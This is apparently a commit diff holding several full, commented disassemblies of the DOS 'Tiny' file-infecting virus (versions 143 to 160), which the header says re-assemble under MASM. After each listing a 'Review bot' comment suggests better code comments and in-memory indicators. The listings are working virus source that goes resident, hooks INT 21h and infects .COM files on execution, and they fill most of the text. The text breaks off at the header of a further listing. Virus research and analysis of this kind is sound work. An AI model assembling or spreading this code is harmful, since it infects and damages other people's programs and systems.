; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-143 º
; º Disassembled by Vesselin Bontchev, August 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Initialize some registers
mov di,offset start ; Put the addres of program start in DI
mov bx,int_21-first4+seg_60 ; Point BX at new INT 13h handler
; The virus will be installed in memory at
; address 0050:0100h (i.e., at segment 60h):
mov cx,50
add si,[si+2] ; Determine the start addres of the virus body
push di ; Now a Near RET instruction will run the prg.
movsw ; Restore the original first 4 bytes
movsw
mov es,cx ; Point ES:DI at 0050:0100h
cmpsb ; Check if the virus is present in memory
jz run ; Just run the program if so
; Virus not in memory. Install it there:
dec si ; Correct SI & DI to point at the start of
dec di ; virus code and to destination address
rep movsw ; Move the virus there
mov es,cx ; ES := 0
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler.
; By the way, now DI == 1A4h (i.e., 69h*4):
xchg ax,bx ; Thransfer INT 21h vector to INT 69h,
xchg ax,cx ; preserving AX
lp:
xchg ax,cx ; Get a word
xchg ax,es:[di-(69-21)*4] ; Swap the two words
stosw ; Save the word
jcxz lp ; Loop until done (two times)
xchg ax,bx ; Restore AX (to keep progs as DISKCOPY happy)
run:
push ds ; Restore ES
pop es
ret ; And exit (go to CS:100h)
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push dx
push ds
push es
mov ax,3D02 ; Open the file for both reading and writting
int 69
jc end_exec ; Exit on error
xchg ax,bx ; Save the file handle in BX
call lseek1 ; Lseek to file beginning (and set CL to 4)
mov al,seg_60 shr 4 ; Read the first 4 bytes of the file
mov ds,ax ; Set buffer offset to 0060:0000h
mov es,ax ; Point ES there too
mov ah,3F
int 69 ; Do read
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
xor di,di
mov al,'M' ; Look for `M'
repne scasb
jz close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file (and put 4 in CL)
call lseek
push ax ; Save file length
mov cl,v_len ; Length of virus body
mov ah,40 ; Append the virus to the file
int 69 ; Do it
call lseek1 ; Seek to the file beginning
xchg ax,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov ah,40 ; Overwrite the first 4 bytes of the file
int 69 ; Do it
close:
mov ah,3E ; Close the file
int 69
end_exec:
pop es ; Restore used registers
pop ds
pop dx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[69*4]
lseek1:
mov al,0 ; Lseek to the file beginning
lseek:
mov ah,42 ; Lseek either to file beginning or to file end
xor cx,cx
xor dx,dx
int 69 ; Do it
mov cl,4 ; Put 4 in CL
ret ; Done
v_end equ $ ; End of virus body
code ends
end start
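Review bot: L9570 `xchg ax,di` is commented "Point DX at first4" but the instruction writes DI, not DX: DI becomes 0 because AX holds the zero position returned by the `lseek1` call on L9569 (L9596–L9598 zero CX and DX before the seek), and DX is already 0 from that same `xor dx,dx`. I would change it to `xchg ax,di ; DI := 0 (first4 offset) for the stosb/stosw below; DX is already 0 from lseek1`. The installation comments also carry the wrong vector names for this version: L9507 says "INT 13h" and L9523 says "INT 32h", whereas L9530 and L9591 show the old INT 21h vector parked at INT 69h, so `Point BX at new INT 21h handler` and `Move the INT 21h handler to INT 69h` match the code. Unlike the 134/138 listings, the `jc end_exec` on L9548 is live here because it follows `int 69` directly rather than a helper that ends in `xor di,di`; that is a real behavioural difference between variants and deserves a line in the header box.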


@ -0,0 +1,182 @@
page ,132
name TINY154
title The 'Tiny' virus, version TINY-154
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-154 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg ax,bx ; Save the file handle in BX
call lseek1
mov ah,3F ; Read the first 4 bytes of the file
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek
push ax ; Save file length
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
call lseek1 ; Seek to the file beginning
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
lseek1:
mov al,0 ; Lseek to file beginning
lseek:
mov ah,42 ; Lseek either to file beginning or to file end
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dh,6 ; Put 6 in DH and 4 in CL
mov cl,4
ret ; Done
v_end equ $ ; End of virus body
code ends
end start
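Review bot: L9688 `call lseek1` is commented only as a seek, but the handler depends on two side effects it leaves behind: `lseek` ends with `mov dh,6` and `mov cl,4` (L9739–L9740), so L9690 `mov di,dx` and the read on L9693 silently rely on DX = 600h (the body copy at 0000:0600h, where the handler runs because the segment swapped into the vector on L9663 is 0) and CX = 4. I would comment L9688 as `call lseek1 ; Seek to start; leaves DX=600h (first4 copy) and CL=4 for the read`. The `mov dh,6` itself assumes DL is 0 after the seek, which holds for a seek to the beginning and, for the seek-to-end on L9703, only while the high word of the file size is 0 (files under 64 KB); there is no size check in the hunk, so `mov dh,6 ; DX := 600h (assumes DL=0, i.e. file < 64K)` would record that.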


@ -0,0 +1,182 @@
page ,132
name TINY156
title The 'Tiny' virus, version TINY-156
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-156 º
; º Disassembled by Vesselin Bontchev, September 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg ax,bx ; Save the file handle in BX
mov al,0
call lseek
mov ah,3F ; Read the first 4 bytes of the file
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov al,2 ; Seek to the end of file
call lseek
push ax ; Save file length
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov al,0 ; Seek to the file beginning
call lseek
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
lseek:
mov ah,42 ; Lseek either to file beginning or to file end
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dh,6 ; Put 6 in DH and 4 in CL
mov cl,4
ret ; Done
v_end equ $ ; End of virus body
code ends
end start
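Review bot: The inlined `mov al,0` on L9829 has no comment, and the reader cannot tell from it that `lseek` (L9875–L9882) overwrites AH with 42h and leaves DX = 600h and CL = 4 behind for the read on L9831–L9835; the same applies to the second `mov al,0` on L9850 ahead of the write on L9859–L9860. I would comment L9829 as `mov al,0 ; Seek to file beginning; lseek leaves DX=600h, CL=4`. This inlining is the only place the visible text differs from the TINY-154 listing, which keeps an `lseek1` entry for the same purpose; if that accounts for the whole two-byte length difference it is worth one line in the header box, though I have only compared the listings as shown here.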


@ -0,0 +1,178 @@
page ,132
name TINY158
title The 'Tiny' virus, version TINY-158
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-158 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
xchg ax,cx
vect_cpy:
xchg ax,cx
xchg ax,word ptr es:[di-(32-21)*4]
stosw
jcxz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
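Review bot: L9990 `mov dh,6 ; DX = 600h` is only true when DL is 0, and DL at that point is the low byte of the high word of the position returned by the seek-to-end on L9985–L9988; for a file of 64 KB or more the write on L9992–L9993 would take its source from the wrong address. Nothing in the hunk checks the size (the Sourcer-style listing later in this commit does, with `cmp dx,0`), so the comment should carry the assumption: `mov dh,6 ; DX := 600h, assuming DL=0 (file < 64K so high word of size is 0)`. The comment on L9972 "Put them in first4" could also be more precise: DX = 600h addresses the copy of `first4` at 0000:0600h, which is where the handler executes, because the segment word swapped into the INT 21h vector on L9945 is the 0 that `rep movsb` left in CX (L9937), and `push cs`/`pop es` on L9964 therefore yields ES = 0.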


@ -0,0 +1,178 @@
page ,132
name TINY159
title The 'Tiny' virus, version TINY-159
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-159 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
xchg ax,cx
test ax,ax
jz vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
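Review bot: The `vect_cpy` loop on L10082–L10087 terminates on `test ax,ax`, and what is tested is the old CX after `xchg ax,cx`: the first pass continues only because CX is 0 on entry (left by `rep movsb` on L10077), and the second pass stops only because the original INT 21h offset swapped out on L10083 is non-zero; the comment "Loop until done" hides both conditions. I would comment L10086 as `test ax,ax ; pass 1: AX = CX = 0 -> loop; pass 2: AX = old INT 21h offset (assumed non-zero) -> exit`. The same assumption sits behind the `jcxz` form in the 154–158 listings, so a short remark in the header box about the two-word vector swap would serve all of them. It also fixes the new vector segment at 0 (the second pass swaps in AX = 0), i.e. the handler runs at 0000:06xx rather than in the 60h segment the `seg_60` name suggests — a concrete in-memory indicator worth stating next to L10079.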


@ -0,0 +1,178 @@
page ,132
name TINY160
title The 'Tiny' virus, version TINY-160
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
; º º
; º The 'Tiny' Virus, version TINY-160 º
; º Disassembled by Vesselin Bontchev, July 1990 º
; º º
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
; º º
; º This listing is only to be made available to virus researchers º
; º or software writers on a need-to-know basis. º
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-first4
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
v_entry:
mov si,0FF ; Determine the start addres of the virus body
add si,[si+2]
mov di,offset start ; Put the addres of program start on the stack
push di ; Now a Near RET instruction will jump there
push ax ; Save AX (to keep programs as DISKCOPY happy)
movsw ; Restore the original first 4 bytes
movsw
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len-2 ; CX := virus length
lodsw ; Check if virus is present in memory
scasw
je run ; Just run the program if so
; Virus not in memory. Install it there:
dec di ; Adjust DI
dec di
stosw ; Store the first word of the virus body
rep movsb ; Store the rest of the virus
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
mov cl,2 ; The vector is 2 words long
mov ax,int_21-first4+seg_60 ; Offset
; Move the INT 21h handler to INT 32h and
; install int_21 as new INT 21h handler:
vect_cpy:
xchg ax,word ptr es:[di-(32-21)*4]
stosw
mov ax,es ; Segment
loop vect_cpy ; Loop until done
run:
pop ax ; Restore AX
push ds ; ES := DS
pop es
; Jump to program start via funny RET instruction:
ret
int_21: ; New INT 21h handler
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
xchg bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
inc ax
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
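Review bot: L10226 `mov ax,es ; Segment` is the line that decides where the hook executes, and the comment does not say which segment that is: ES was set to 0 on L10207–L10208, so the INT 21h vector written on L10224 becomes 0000:(int_21 offset + 600h) and the handler runs from the copy at 0000:0600h, which is why `push cs`/`pop es` on L10244 and `mov dx,seg_60` on L10252 address the same buffer. I would comment it as `mov ax,es ; Segment := 0 (ES), handler runs at 0000:06xx`. The `mov cl,2`/`loop` form on L10219 and L10227 removes the assumption about the original INT 21h offset being non-zero that the `jcxz`/`test` loops of the 154–159 listings carry, which is a useful line for the header box when comparing variants. As in the 158 listing, L10270 `mov dh,6` assumes DL = 0 after the seek-to-end on L10265–L10268, i.e. a file under 64 KB; `; DX := 600h (assumes DL=0, file < 64K)` records that.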


@ -0,0 +1,126 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ S ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 4-Aug-90 ÛÛ
;ÛÛ Version: ÛÛ
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
;ÛÛ ÛÛ
;ÛÛ ÛÛ
